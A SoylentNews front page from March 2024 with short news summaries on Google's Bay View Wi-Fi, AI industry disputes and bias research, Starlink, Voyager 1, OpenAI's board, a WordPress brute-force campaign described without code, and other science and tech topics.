Stories
Slash Boxes
Comments

SoylentNews is people

Log In

Log In

Create Account  |  Retrieve Password


Site News

Join our Folding@Home team:
Main F@H site
Our team page


Funding Goal
For 6-month period:
2022-07-01 to 2022-12-31
(All amounts are estimated)
Base Goal:
$3500.00

Currently:
$438.92

12.5%

Covers transactions:
2022-07-02 10:17:28 ..
2022-10-05 12:33:58 UTC
(SPIDs: [1838..1866])
Last Update:
2022-10-05 14:04:11 UTC --fnord666

Support us: Subscribe Here
and buy SoylentNews Swag


We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.

What is your favorite keyboard trait?

  • QWERTY
  • AZERTY
  • Silent (sounds)
  • Clicky sounds
  • Thocky sounds
  • The pretty colored lights
  • I use Braille you insensitive clod
  • Other (please specify in comments)

[ Results | Polls ]
Comments:63 | Votes:109

posted by janrinok on Wednesday March 13 2024, @07:52PM   Printer-friendly

Google's swanky new "Bay View" campus apparently has a major problem: bad Wi-Fi. Reuters reports that Google's first self-designed office building has "been plagued for months by inoperable or, at best, spotty Wi-Fi, according to six people familiar with the matter." A Google spokesperson confirmed the problems and said the company is working on fixing them.

Bay View opened in May 2022. At launch, Google's VP of Real Estate & Workplace Services, David Radcliffe, said the site "marks the first time we developed one of our own major campuses, and the process gave us the chance to rethink the very idea of an office." The result is a wild tent-like structure with a striking roofline made up of swooping square sections. Of course, it's all made of metal and glass, but the roof shape looks like squares of cloth held up by poles—each square section has high points on the four corners and sags down in the middle. The roof is covered in solar cells and collects rainwater while also letting in natural light, and Google calls it the "Gradient Canopy."

According to one AI engineer assigned to the building, which also houses members of the advertising team, the wonky Wi-Fi has been no help for Google pushing a three day per week return-to-office mandate.

"You'd think the world's leading internet company would have worked this out," he said. Like others, he spoke to Reuters on the condition of anonymity because Google has not authorized them to talk about work conditions.

Managers have encouraged workers to stroll outside or sit at the adjoining cafe where the Wi-Fi signal is stronger.


Original Submission

posted by janrinok on Wednesday March 13 2024, @03:04PM   Printer-friendly
from the there-are-too-many-AI-stories! dept.

[We have had several complaints recently (polite ones, not a problem) regarding the number of AI stories that we are printing. I agree, but that reflects the number of submissions that we receive on the subject. So I have compiled a small selection of AI stories into one and you can read them or ignore them as you wish. If you are making a comment please make it clear exactly which story you are referring to unless your comment is generic. The submitters each receive the normal karma for a submission. JR]

Image-scraping Midjourney bans rival AI firm for scraping images

https://arstechnica.com/information-technology/2024/03/in-ironic-twist-midjourney-bans-rival-ai-firm-employees-for-scraping-its-image-data/

On Wednesday, Midjourney banned all employees from image synthesis rival Stability AI from its service indefinitely after it detected "botnet-like" activity suspected to be a Stability employee attempting to scrape prompt and image pairs in bulk. Midjourney advocate Nick St. Pierre tweeted about the announcement, which came via Midjourney's official Discord channel.

[...] Siobhan Ball of The Mary Sue found it ironic that a company like Midjourney, which built its AI image synthesis models using training data scraped off the Internet without seeking permission, would be sensitive about having its own material scraped. "It turns out that generative AI companies don't like it when you steal, sorry, scrape, images from them. Cue the world's smallest violin."

[...] Shortly after the news of the ban emerged, Stability AI CEO Emad Mostaque said that he was looking into it and claimed that whatever happened was not intentional. He also said it would be great if Midjourney reached out to him directly. In a reply on X, Midjourney CEO David Holz wrote, "sent you some information to help with your internal investigation."

[...] When asked about Stability's relationship with Midjourney these days, Mostaque played down the rivalry. "No real overlap, we get on fine though," he told Ars and emphasized a key link in their histories. "I funded Midjourney to get [them] off the ground with a cash grant to cover [Nvidia] A100s for the beta."

Midjourney stories on SoylentNews: https://soylentnews.org/search.pl?tid=&query=Midjourney&sort=2
Stable Diffusion (Stability AI) stories on SoylentNews: https://soylentnews.org/search.pl?tid=&query=Stable+Diffusion&sort=2

NYT disputes OpenAI "hacking" claim by pointing to ChatGPT bypassing paywalls

https://arstechnica.com/tech-policy/2024/03/nyt-disputes-openai-hacking-claim-by-pointing-to-chatgpt-bypassing-paywalls/

Late Monday, The New York Times responded to OpenAI's claims that the newspaper "hacked" ChatGPT to "set up" a lawsuit against the leading AI company.

[...] OpenAI had argued that NYT allegedly made "tens of thousands of attempts to generate" supposedly "highly anomalous results" showing that ChatGPT would produce excerpts of NYT articles. [...] But while defending tactics used to prompt ChatGPT to spout memorized training data—including more than 100 NYT articles—NYT pointed to ChatGPT users who have frequently used the tool to generate entire articles to bypass paywalls.

According to the filing, NYT today has no idea how many of its articles were used to train GPT-3 and OpenAI's subsequent AI models, or which specific articles were used, because OpenAI has "not publicly disclosed the makeup of the datasets used to train" its AI models. Rather than setting up a lawsuit, NYT was prompting ChatGPT to discover evidence in attempts to track the full extent of copyright infringement of the tool, NYT argued. [...] "In OpenAI's telling, The Times engaged in wrongdoing by detecting OpenAI's theft of The Times's own copyrighted content," NYT's court filing said. "OpenAI's true grievance is not about how The Times conducted its investigation, but instead what that investigation exposed: that Defendants built their products by copying The Times's content on an unprecedented scale—a fact that OpenAI does not, and cannot, dispute." On an OpenAI community page, one paid ChatGPT user complained that OpenAI is "working against the paid users of ChatGPT Plus. This time they're taking away Browsing, because it reads the content of a site that the user asks for? Please, that's what I pay for Plus for."

"I know it's no use complaining, because OpenAI is going to increasingly 'castrate' ChatGPT 4," the ChatGPT user continued, "but there's my rant."

NYT argued that public reports of users turning to ChatGPT to bypass paywalls "contradict OpenAI's contention that its products have not been used to serve up paywall-protected content, underscoring the need for discovery" in the lawsuit, rather than dismissal.

NYT wants a court to not only award damages for profits lost due to ChatGPT's alleged infringement, but also to order a permanent injunction to stop ChatGPT from infringement. A win for NYT could mean that OpenAI could be forced to wipe ChatGPT and start over. That could perhaps spur OpenAI to build a new AI model based on licensed content—since OpenAI said earlier this year it would be "impossible" to create useful AI models without copyrighted content—which would ensure publishers like NYT always get paid for training data.

Previously on SoylentNews:
OpenAI Says New York Times 'Hacked' ChatGPT to Build Copyright Lawsuit - 20240301
Why the New York Times Might Win its Copyright Lawsuit Against OpenAI - 20240220
New York Times Sues Microsoft, ChatGPT Maker OpenAI Over Copyright Infringement - 20231228
Report: Potential NYT lawsuit could force OpenAI to wipe ChatGPT and start over - 20230821

Related stories on SoylentNews:
Microsoft in Deal With Semafor to Create News Stories With Aid of AI Chatbot - 20240206
AI Threatens to Crush News Organizations. Lawmakers Signal Change Is Ahead - 20240112
Writers and Publishers Face an Existential Threat From AI: Time to Embrace the True Fans Model - 20230415

LLMs Become More Covertly Racist With Human Intervention

LLMs become more covertly racist with human intervention:

Even when the two sentences had the same meaning, the models were more likely to apply adjectives like "dirty," "lazy," and "stupid" to speakers of African American English (AAE) than speakers of Standard American English (SAE). The models associated speakers of AAE with less prestigious jobs (or didn't associate them with having a job at all), and when asked to pass judgment on a hypothetical criminal defendant, they were more likely to recommend the death penalty.

An even more notable finding may be a flaw the study pinpoints in the ways that researchers try to solve such biases.

To purge models of hateful views, companies like OpenAI, Meta, and Google use feedback training, in which human workers manually adjust the way the model responds to certain prompts. This process, often called "alignment," aims to recalibrate the millions of connections in the neural network and get the model to conform better with desired values.

The method works well to combat overt stereotypes, and leading companies have employed it for nearly a decade. If users prompted GPT-2, for example, to name stereotypes about Black people, it was likely to list "suspicious," "radical," and "aggressive," but GPT-4 no longer responds with those associations, according to the paper.

However the method fails on the covert stereotypes that researchers elicited when using African-American English in their study, which was published on arXiv and has not been peer reviewed. That's partially because companies have been less aware of dialect prejudice as an issue, they say. It's also easier to coach a model not to respond to overtly racist questions than it is to coach it not to respond negatively to an entire dialect.

"Feedback training teaches models to consider their racism," says Valentin Hofmann, a researcher at the Allen Institute for AI and a coauthor on the paper. "But dialect prejudice opens a deeper level."

Avijit Ghosh, an ethics researcher at Hugging Face who was not involved in the research, says the finding calls into question the approach companies are taking to solve bias.

"This alignment—where the model refuses to spew racist outputs—is nothing but a flimsy filter that can be easily broken," he says.


Original Submission #1Original Submission #2Original Submission #3

posted by hubie on Wednesday March 13 2024, @10:22AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Russian troops in Ukraine have allegedly been using SpaceX’s Starlink terminals to get internet access during the ongoing war that has seen hundreds of thousands of casualties on each side. And now, House Democrats are finally asking hard questions of SpaceX leadership about how this could be happening, according to an open letter published on Thursday.

The letter to SpaceX president and COO Gwynne Shotwell from some top Democrats in the House makes the case that Starlink’s high-speed satellite internet access is considered essential to Ukraine’s continued ability to fight against Russia’s invasion, which first started in February 2022.

The letter from the Democrats, led by Rep. Jamie Raskin of Maryland and Rep. Robert Garcia of California, stresses that Russia’s use of Starlink tech would be “potentially in violation of U.S. sanctions and export controls.”

The Wall Street Journal was the first to report on February 15 that Russian troops have been using Starlink internet for “quite a long time,” according to Ukraine’s Lt. Gen. Kyrylo Budanov.

Russia is believed to be acquiring the Starlink terminals from black market sellers, sometimes posing as German appliance manufacturers according to the Journal, but SpaceX leaders presumably have insight into who and how these terminals might be used by illicit Russian actors. For example, Musk shut off Starlink access for Ukrainian-controlled devices in Crimea early in the war, ostensibly to stop an “escalation” of the conflict.


Original Submission

posted by hubie on Wednesday March 13 2024, @05:37AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

For more than 45 years, the Voyager 1 spacecraft has been cruising through the cosmos, crossing the boundary of our solar system to become the first human-made object to venture to interstellar space. Iconic in every regard, Voyager 1 has delivered groundbreaking data on Jupiter and Saturn, and captured the loneliest image of Earth. But perhaps nothing is lonelier than an aging spacecraft that has lost its ability to communicate while traveling billions of miles away from home.

NASA’s Voyager 1 has been glitching for months, sending nonsensical data to ground control. Engineers at NASA’s Jet Propulsion Laboratory (JPL) have been trying to resolve the issue, but given how far the spacecraft currently is, the process has been extremely slow. Things are looking pretty bleak for the aging mission, which might be nearing the end. Still, NASA isn’t ready to let go of its most distant spacecraft just yet.

“The team continues information gathering and are preparing some steps that they’re hopeful will get them on a path to either understand the root of the problem and/or solve it,” a JPL spokesperson told Gizmodo in an email.

The anomaly may have something to do with the spacecraft’s flight data system (FDS). FDS collects data from Voyager’s science instruments, as well as engineering data about the health of the spacecraft and combines them into a single package that’s transmitted to Earth through one of the probe’s subsystems, the telemetry modulation unit (TMU), in binary code.

FDS and TMU, however, may be having trouble communicating with one another. As a result, TMU has been sending data to mission control in a repeating pattern of ones and zeroes.

Related:
    Humanity's Most Distant Space Probe Jeopardized by Computer Glitch
    Engineers Work to Fix Voyager 1 Computer


Original Submission

posted by hubie on Wednesday March 13 2024, @12:56AM   Printer-friendly
from the everything-is-fine dept.

https://arstechnica.com/information-technology/2024/03/openai-ceo-sam-altmans-conduct-did-not-mandate-removal-says-independent-review/

On Friday afternoon Pacific Time, OpenAI announced the appointment of three new members to the company's board of directors and released the results of an independent review of the events surrounding CEO Sam Altman's surprise firing last November. The current board expressed its confidence in the leadership of Altman and President Greg Brockman, and Altman is rejoining the board.
[...]
The independent review, conducted by law firm WilmerHale, investigated the circumstances that led to Altman's abrupt removal from the board and his termination as CEO on November 17, 2023. Despite rumors to the contrary, the board did not fire Altman because they got a peek at scary new AI technology and flinched. "WilmerHale... found that the prior Board's decision did not arise out of concerns regarding product safety or security, the pace of development, OpenAI's finances, or its statements to investors, customers, or business partners."

Instead, the review determined that the prior board's actions stemmed from a breakdown in trust between the board and Altman.
[...]
Altman's surprise firing occurred after he attempted to remove Helen Toner from OpenAI's board due to disagreements over her criticism of OpenAI's approach to AI safety and hype. Some board members saw his actions as deceptive and manipulative. After Altman returned to OpenAI, Toner resigned from the OpenAI board on November 29.

In a statement posted on X, Altman wrote, "i learned a lot from this experience. one think [sic] i'll say now: when i believed a former board member was harming openai through some of their actions, i should have handled that situation with more grace and care. i apologize for this, and i wish i had done it differently."
[...]
After OpenAI's announcements on Friday, resigned OpenAI board members Toner and Tasha McCauley released a joint statement on X. "Accountability is important in any company, but it is paramount when building a technology as potentially world-changing as AGI," they wrote. "We hope the new board does its job in governing OpenAI and holding it accountable to the mission. As we told the investigators, deception, manipulation, and resistance to thorough oversight should be unacceptable."

Previously on SoylentNews:
Sam Altman Officially Back as OpenAI CEO: "We Didn't Lose a Single Employee" - 20231202
AI Breakthrough That Could Threaten Humanity Might Have Been Key To Sam Altman's Firing - 20231124
OpenAI CEO Sam Altman Purged, President Brockman Quits, but Maybe They'll All Come Back After All - 20231119


Original Submission

posted by janrinok on Tuesday March 12 2024, @08:12PM   Printer-friendly
from the all-about-that-bass dept.

Modern voice preferences among wide cross-cultural sample clarifies evolutionary origins, with lower pitches seen as more attractive and formidable:

If you're looking for a long-term relationship or to boost your social status, lower your pitch, according to researchers studying the effects of voice pitch on social perceptions. They found that lower voice pitch makes women and men sound more attractive to potential long-term partners, and lower voice pitch in males makes the individual sound more formidable and prestigious among other men.

[...] "Vocal communication is one of the most important human characteristics, and pitch is the most perceptually noticeable aspect of voice," said David Puts, study co-author and professor of anthropology at Penn State. "Understanding how voice pitch influences social perceptions can help us understand social relationships more broadly, how we attain social status, how we evaluate others on social status and how we choose mates."

[...] The researchers found that women and men preferred lower-pitched voices when asked which voice they would prefer for a long-term relationship such as marriage. They also found that a lower male voice pitch made the individual sound more formidable, especially among younger men, and more prestigious, particularly among older men. Perceptions of formidability and prestige had a larger impact in societies with more relational mobility — where group members interact more often with strangers — and more violence.

[...] The fact that study participants across cultures perceived a lower male voice pitch as conferring formidability and high social status suggests that these characteristics were likely conferred to our ancestors as well, said Puts, who is co-funded by the Social Science Research Institute at Penn State. He likened the effect to that of Darth Vader's voice in the Star Wars franchise: no matter where the character goes in the galaxy, his low pitch is perceived as formidable because larger beings tend to produce lower frequencies.

"The findings suggest that deep voices evolved in males because our male ancestors frequently interacted with competitors who were strangers, and they show how we can use evolutionary thinking and research from nonhuman animals to predict and understand how our psychology and behaviors vary across social contexts, including cross-culturally," Puts said. "Male traits such as deep voices and beards are highly socially salient, but this new research shows that the salience of at least one of these traits varies in predictable ways across societies, and it suggests that others, such as beards, do too."

[...] "This study suggests that voice pitch is relevant to social perceptions across societies," Puts said. "But it also shows that the extent of our attention to voice pitch when making social attributions is variable across societies and responsive to relevant sociocultural variables. In a society where there's higher relational mobility and you have less direct information about your competitors, people appear to be more attentive to an easily identifiable, recognizable signal like voice pitch."

Journal Reference:
Aung, T., Hill, A. K., Hlay, J. K., et al. (2024). Effects of Voice Pitch on Social Perceptions Vary With Relational Mobility and Homicide Rate. Psychological Science. https://doi.org/10.1177/09567976231222288


Original Submission

posted by janrinok on Tuesday March 12 2024, @03:26PM   Printer-friendly
from the rising-stars dept.

https://phys.org/news/2024-03-hidden-star-sand-dune-mystery.html

Scientists have solved the mysterious absence of star-shaped dunes from Earth's geological history for the first time, dating one back thousands of years.

[...] Star dunes are massive sand dunes that owe their name to arms that spread from a central peak. These sand pyramids, which look like stars when viewed from above, are widespread in modern deserts including sand seas in Africa, Arabia, China, and North America.

The research reveals the oldest parts of the base of the Moroccan dune are 13,000 years old. However, the discovery that it formed rapidly in the last thousand years surprised scientists who had thought larger dunes were far older.

Believed to be the tallest dunes on Earth—with one in the Badain Jaran Desert in China reaching 300 meters high—star dunes are also found elsewhere in the solar system, on Mars and on Saturn's moon Titan.

Despite being common today, star dunes have almost never been found in the geological record. Their absence has bemused scientists as past deserts are a common part of the history of Earth, preserved in rocks deep underground.

Published in the journal Scientific Reports, the new study dated the foundations of a star dune in the southeast of Morocco known as Lala Lallia, meaning "highest sacred point" in the Berber language, to about 13,000 years old.

The dune sits in the Erg Chebbi area of the Sahara Desert close to the border with Algeria, an area featured in TV series like SAS Rogue Heroes and blockbuster films such as The Mummy and Sahara.

The research shows that the sand pyramid reached its current 100-meter height and 700-meter width due to rapid growth in the past thousand years as it shifted slowly to the west.

More information: C. S. Bristow et al, Structure and chronology of a star dune at Erg Chebbi, Morocco, reveals why star dunes are rarely recognised in the rock record, Scientific Reports (2024). DOI: 10.1038/s41598-024-53485-3


Original Submission

posted by janrinok on Tuesday March 12 2024, @10:42AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Attackers have transformed hundreds of hacked sites running WordPress software into command-and-control servers that force visitors’ browsers to perform password-cracking attacks.

A web search for the JavaScript that performs the attack showed it was hosted on 708 sites at the time this post went live on Ars, up from 500 two days ago. Denis Sinegubko, the researcher who spotted the campaign, said at the time that he had seen thousands of visitor computers running the script, which caused them to reach out to thousands of domains in an attempt to guess the passwords of usernames with accounts on them.

“This is how thousands of visitors across hundreds of infected websites unknowingly and simultaneously try to bruteforce thousands of other third-party WordPress sites,” Sinegubko wrote. “And since the requests come from the browsers of real visitors, you can imagine this is a challenge to filter and block such requests.”

Like the hacked websites hosting the malicious JavaScript, all the targeted domains are running the WordPress content management system. The script—just 3 kilobits in size—reaches out to an attacker-controlled getTaskURL, which in turn provides the name of a specific user on a specific WordPress site, along with 100 common passwords. When this data is fed into the browser visiting the hacked site, it attempts to log into the targeted user account using the candidate passwords. The JavaScript operates in a loop, requesting tasks from the getTaskURL reporting the results to the completeTaskURL, and then performing the steps again and again.

[...] With 418 password batches as of Tuesday, Sinegubko has concluded the attackers are trying 41,800 passwords against each targeted site.

Sinegubko wrote:

The attack consists of five key stages that allow a bad actor to leverage already compromised websites to launch distributed brute force attacks against thousands of other potential victim sites.

So, how do attackers actually accomplish a distributed brute force attack from the browsers of completely innocent and unsuspecting website visitors? Let’s take a look at stage 4 in closer detail.

As of Tuesday, the researcher had observed “dozens of thousands of requests” to thousands of unique domains that checked for files uploaded by the visitor browsers. Most files reported 404 web errors, an indication that the login using the guessed password failed. Roughly 0.5 percent of cases returned a 200 response code, leaving open the possibility that password guesses may have been successful. On further inspection, only one of the sites was compromised. The others were using non-standard configurations that returned the 200 response, even for pages that weren’t available.

Over a four-day span ending Tuesday, Sinegubko recorded more than 1,200 unique IP addresses that tried to download the credentials file. Of those, five addresses accounted for over 85 percent of the requests:


Original Submission

posted by janrinok on Tuesday March 12 2024, @05:59AM   Printer-friendly

https://phys.org/news/2024-03-birds-smart.html

Researchers at Ruhr University Bochum explain how it is possible for the small brains of pigeons, parrots and corvids to perform equally well as those of mammals, despite their significant differences.

Since the late 19th century, it has been a common belief among researchers that high intelligence requires the high computing capacity of large brains. They also discovered that the cerebral cortex as typical of mammals is necessary to analyze and link information in great detail.

Avian brains, by contrast, are very small and lack any structure resembling a cortex. Nevertheless, scientists showed that parrots and corvids are capable of planning for the future, forging social strategies, recognizing themselves in mirrors and building tools. These and similar aptitudes put them on a par with chimpanzees.
...
The authors of the study show that birds have developed four similar innovations for intelligence during their evolution, independently of mammals.

First, birds have many more nerve cells in their small brains than previously believed. Corvids in particular place this extra portion of computing capacity in those areas of the brain that are most important for cognition.

The second reason is that birds have a specialized brain structure that is similar to the prefrontal cortex in mammals and is crucial for abstraction and planning. This brain region is moreover exceptionally large in intelligent birds and mammals.

Third, birds and mammals alike have a system that uses the neurotransmitter dopamine to constantly feedback the quality of their decisions to the prefrontal system. As a result, the prefrontal computational processes continuously adapt to changing situations and the success or failure of the decisions of the individual.

Finally, birds have independently developed a very similar working memory to temporarily hold things in short-term memory. Like jugglers who constantly keep many balls spinning in the air, birds and mammals use a flexible activity pattern of their nerve cells to keep a lot of information active at the same time

More information: Onur Güntürkün et al, Why birds are smart, Trends in Cognitive Sciences (2023). DOI: 10.1016/j.tics.2023.11.002


Original Submission

posted by janrinok on Tuesday March 12 2024, @01:13AM   Printer-friendly
from the If-you-want-it-done-right,-do-it-yourself! dept.

It's well known, Americans don't trust Chinese IT hardware. Well, guess what?

They don't trust ours either!

https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f

Can you blame them? It's got to the point I trust an Arduino - that I personally program - far more than anything out there.

I believe computers also follow the "Peter Principle". Each new update becomes more and more encrusted with layers of fix code that no matter how fast the CPU runs, or how much memory one has, the "attack surface" grows so immense that deliberately hiding secret backdoors and "sleeper cell" code makes vetting trusted code nearly impossible.

https://html.duckduckgo.com/html?q=peter%20principle

So the Chinese don't trust American IT. Gee, I don't trust it either!

I am sure the Chinese are really fed up with all the nebulous terms, conditions, disclaimers, hold harmless, copyright violation threats, and the risk of being given the Roku treatment, with contracts written in such a manner they can be changed after payment clears, enforced by code, then forcing whatever terms to continue or consider the investment in the proprietary technology a sunk cost.

If you need it done right, learn to do it yourself, or forever be under the control of someone else who does.

Another thing ... If you are strong enough, you can dictate the rules of the game too


Original Submission

posted by janrinok on Monday March 11 2024, @08:32PM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

A group of cloud infrastructure providers in Europe has delivered an ultimatum to Microsoft: End the "unjustified feature and pricing discriminations against fair competition" or face legal action.

With 27 member organizations – including 26 headquartered in the region plus US-based AWS – Cloud Infrastructure Providers in Europe (CISPE) is a non-profit industry group based in Brussels. It filed a complaint against Microsoft with the EU's antitrust cops in November 2022.

That complaint laid out how Microsoft discounts its own software when bundled with its own Azure cloud services – meaning it is more expensive to run Redmond’s wares in rival clouds. The Windows goliath tried to settle the case out of court last May. CISPE told The Register Microsoft's offer was "paltry" and rejected it.

The parties recently resumed negotiations, and the timing of today's statement to The Register seems designed to ratchet pressure on Microsoft's lawyers to offer bigger concessions. CISPE told us it used the Azure Pricing Calculator to highlight the pricing disparity at the heart of the issue – see the table below, provided by CISPE.

It shows, if CISPE is right, that although a member of the cloud association – a rival of Azure – can offer remote desktop virtual machines at lower cost than Microsoft, the red-tape put in place by Redmond leaves the competing provider worse off for customers in comparison, causing the rival to potentially lose sales to Azure.

"According to the Azure Pricing Calculator with the multi-session capabilities allowed on Azure, a customer can run a typical virtual desktop implementation supporting 32 users using just three virtual machines," the group explained.

"The licensing restrictions on multi-session use of Microsoft software outside of Azure impose on CISPE members to provision 32 virtual machines – that is ten time more machines – to support the same number of users. Even with lower cost hardware (VM cost per hour) the cost of supporting 32 users for a CISPE member is 2.5 times higher than what Microsoft charges."

The dominance of Microsoft software in the enterprise means cloud infrastructure providers often need to accommodate customers' IT estates that inevitably include Office, Windows, and more. That's software Microsoft ensures is cheaper to run on Microsoft's Azure cloud compared to rivals, according to CISPE, hence that group's unhappiness.

CISPE members are similarly upset about the price of service provider license agreements, arguing Microsoft charges double digit percentages more to run SQL Server Enterprise licensing on non-Azure servers. Again, here's a table from CISPE advancing those claims.

"These figures are just the tip of the iceberg," Francisco Mingorance, secretary general of CISPE, told The Register. "This data represents prima facie evidence that Microsoft is acting against fair competition.

"The unjustified feature and pricing discriminations imposed by Microsoft on its dominant software, Office and Windows, outside of Azure, squeeze the margins of rival cloud infrastructure providers, lock in customers and raise prices."

"It is clear that there is a straightforward competition case here and that if these unfair licensing practices are not immediately ended by Microsoft voluntarily, legal and regulatory action should swiftly follow," he declared.

[...] The EU anti-trust team and competition authorities at the US Federal Trade Commission are also running investigations into Microsoft's cloudy licensing offers.


Original Submission

posted by hubie on Monday March 11 2024, @03:43PM   Printer-friendly
from the complaints-department-5000-miles-> dept.

https://arstechnica.com/information-technology/2024/03/some-teachers-are-now-using-chatgpt-to-grade-papers/

In a notable shift toward sanctioned use of AI in schools, some educators in grades 3–12 are now using a ChatGPT-powered grading tool called Writable, reports Axios. The tool, acquired last summer by Houghton Mifflin Harcourt, is designed to streamline the grading process, potentially offering time-saving benefits for teachers. But is it a good idea to outsource critical feedback to a machine?
[...]
"Make feedback more actionable with AI suggestions delivered to teachers as the writing happens," Writable promises on its AI website. "Target specific areas for improvement with powerful, rubric-aligned comments, and save grading time with AI-generated draft scores." The service also provides AI-written writing-prompt suggestions: "Input any topic and instantly receive unique prompts that engage students and are tailored to your classroom needs."
[...]
The reliance on AI for grading will likely have drawbacks. Automated grading might encourage some educators to take shortcuts, diminishing the value of personalized feedback. Over time, the augmentation from AI may allow teachers to be less familiar with the material they are teaching. The use of cloud-based AI tools may have privacy implications for teachers and students. Also, ChatGPT isn't a perfect analyst. It can get things wrong and potentially confabulate (make up) false information, possibly misinterpret a student's work, or provide erroneous information in lesson plans.
[...]
there's a divide among parents regarding the use of AI in evaluating students' academic performance. A recent poll of parents revealed mixed opinions, with nearly half of the respondents open to the idea of AI-assisted grading.

As the generative AI craze permeates every space, it's no surprise that Writable isn't the only AI-powered grading tool on the market. Others include Crowdmark, Gradescope, and EssayGrader. McGraw Hill is reportedly developing similar technology aimed at enhancing teacher assessment and feedback.

Related stories on SoylentNews:
SWOT Analysis of ChatGPT in Computer Science Education - 20240215
OpenAI Admits That AI Writing Detectors Don't Work - 20230911
An Iowa School District is Using ChatGPT to Decide Which Books to Ban - 20230817
A Jargon-Free Explanation of How AI Large Language Models Work - 20230805
Why AI detectors think the US Constitution was written by AI - 20230718
Dishonor Code: What Happens When Cheating Becomes the Norm? - 20230301
Amid ChatGPT Outcry, Some Teachers are Inviting AI to Class - 20230221
Seattle Public Schools Bans ChatGPT; District 'Requires Original Thought and Work From Students' - 20230119
ChatGPT Arrives in the Academic World - 20221219


Original Submission

posted by janrinok on Monday March 11 2024, @10:54AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Intel is on track to receive $3.5 billion in US CHIPS Act funding to produce advanced semiconductors for American military and intelligence programs.

The chipmaker has been a top contender for the cash with rumors swirling since November that the x86 giant would receive anywhere from $3-$4 billion. This funding, siphoned from the overall $39 billion in CHIPS and Science Act allotment,  would presumably support the development of a "secure enclave," which we understand to be a separate production line dedicated to military chip production.

According to Bloomberg the $3.5 billion will be dispersed over the next three years. The news was tucked away in a spending bill passed by the US House of Reps Wednesday, and will cement Intel as the leading producer of silicon for the defense market.

However, it's not like Uncle Sam had much of a choice if it wanted to keep production of military silicon in the US. Intel is so now the only American chipmaker producing leading edge silicon domestically.

New York-based GlobalFoundries abandoned development of 7nm and smaller process tech back in 2018 in order to focus on more mature and niche process tech in areas like radio communications, imaging, optical, automotive, industrial, and IoT.

Even still, many of GlobalFoundries' processes still have military applications, with the company still in early deliver on a 10-year $3.1 billion DoD contract to produce semiconductors for aerospace and defense applications awarded last fall.

That leaves Taiwan's TSMC and South Korea's Samsung Electronics, which are building fabs in Arizona and Texas, as the only other US producers of leading edge chips. However, in this case, it seems that the US government would rather entrust its secrets to American companies.


Original Submission

posted by hubie on Monday March 11 2024, @06:11AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

These are some of the latest disasters listed on the AI Incident Database – a website keeping tabs on all the different ways the technology goes wrong.

Initially launched as a project under the auspices of the Partnership On AI, a group that tries to ensure AI benefits society, the AI Incident Database is now a non-profit organization funded by Underwriters Laboratories – the largest and oldest (est. 1894) independent testing laboratory in the United States. It tests all sorts of products – from furniture to computer mouses – and its website has cataloged over 600 unique automation and AI-related incidents so far.

"There's a huge information asymmetry between the makers of AI systems and public consumers – and that's not fair", argued Patrick Hall, an assistant professor at the George Washington University School of Business, who is currently serving on the AI Incident Database's Board of Directors. He told The Register: "We need more transparency, and we feel it's our job just to share that information."

The AI Incident Database is modeled on the CVE Program set up by the non-profit MITRE, or the National Highway Transport Safety Administration's website reporting publicly disclosed cyber security vulnerabilities and vehicle crashes. "Any time there's a plane crash, train crash, or a big cyber security incident, it's become common practice over decades to record what happened so we can try to understand what went wrong and then not repeat it."

[...] The organization currently collects incidents from media coverage and reviews issues reported by people on Twitter. The AI Incident Database logged 250 unique incidents before the release of ChatGPT in November 2022, and now lists over 600 unique incidents.

[...] "AI is mostly a wild west right now, and the attitude is to go fast and break things," he lamented. It's not clear how the technology is shaping society, and the team hopes the AI Incident Database can provide insights in the ways it's being misused and highlight unintended consequences – in the hope that developers and policymakers are better informed so they can improve their models or regulate the most pressing risks.

[...] Frase is most concerned about the ways AI could erode human rights and civil liberties. She believes that collecting AI incidents will show if policies have made the technology safer over time.

"You have to measure things to fix things," Hall added.

The organization is always looking for volunteers and is currently focused on capturing more incidents and increasing awareness. Frase stressed that the group’s members are not AI luddites: "We're probably coming off as fairly anti-AI, but we're not. We actually want to use it. We just want the good stuff."


Original Submission

posted by janrinok on Monday March 11 2024, @01:24AM   Printer-friendly

https://www.theverge.com/24073300/smart-home-new-house-old-tech

My brother and his wife got a house. He mentioned it appeared to have a lot of tech installed by the last owner. I told him that was an exciting mystery for the two of us. Whatever speakers and weird smart home junk had been set up, we'd be able to repurpose. But then he moved in. Slowly, over weeks of tech support calls and hours digging through shockingly deep coat closets, we learned that while the old owner was gone, his digital ghost remained. It was lurking in the home's lights and shades and thermostat, turning what should have been a smart home into a very haunted one.

I didn't think I'd have to be the IT equivalent of a Ghostbuster when my brother first texted me about it. I've set up multiple smart homes, worked in IT, and currently am surrounded by some of the smartest tech journalists around. As smart home troubleshooting resources go, I have more than the average person.

It was no problem walking him through maximizing the performance of the Google Nest Wifi system still in place (including a full factory reset). But then... the trouble started. There were the window shades that always opened at 8AM and always closed at sundown. My brother disconnected everything that looked like a hub, and still, operating on some inaccessible internal clock, the shades carried on as they were once programmed to do.

[...] Some former homeowners will provide onboarding to the home's smart home system, but most do as the guy who used to own my brother's house did. They walk away and leave it as an adventure for the next person. I know because I've now done it twice myself. I really hope the new renters of my old Brooklyn walk-up appreciate all the 2014 Philips Hue lights I left installed in the basement.


Original Submission